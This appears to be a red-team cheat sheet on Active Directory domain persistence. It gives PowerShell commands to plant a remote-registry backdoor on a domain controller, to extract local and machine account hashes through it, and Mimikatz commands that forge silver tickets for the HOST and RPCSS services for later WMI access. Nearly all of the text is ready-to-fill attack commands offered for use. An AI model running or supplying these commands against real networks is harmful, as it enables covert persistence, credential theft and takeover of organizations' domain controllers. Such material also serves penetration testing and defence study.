REMOTE REGISTRY BACKDOOR
This is a Domain Persistence technqiue
Adding our backdoor through Remote Registry of the Domain Controller
(Needs Domain Administrator Privilege)
Add-RemoteRegBackdoor -ComputerName <DC FQDN> -Trustee <USERNAME>
Retrieving local user account hash remotely from backdoor trustee using persistence of the backdoor anytime
Get-RemoteLocalAccountHash -ComputerName <DC FQDN>
Retrieving machine account hash remotely from backdoor trustee using persistence of the backdoor anytime
Get-RemoteMachineAccountHash -ComputerName <DC FQDN>
This machine account hash from Domain Controller can be used for Silver Ticket attack
Creating a silver ticket to abuse "HOST" service
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /target:<DC FQDN> /service:HOST /rc4:<NTLM OF MACHINE ACCOUNT> /user:Administrator /ptt"'
Creating a silver ticket to abuse "RPCSS" service
Invoke-Mimikatz -Command '"kerberos::golden /domain:<DOMAIN NAME> /sid:<DOMAIN SID> /target:<DC FQDN> /service:RPCSS /rc4:<NTLM OF MACHINE ACCOUNT> /user:Administrator /ptt"'
After receiving Silver Ticket for RPCSS, WMI calls can be queried
Last updated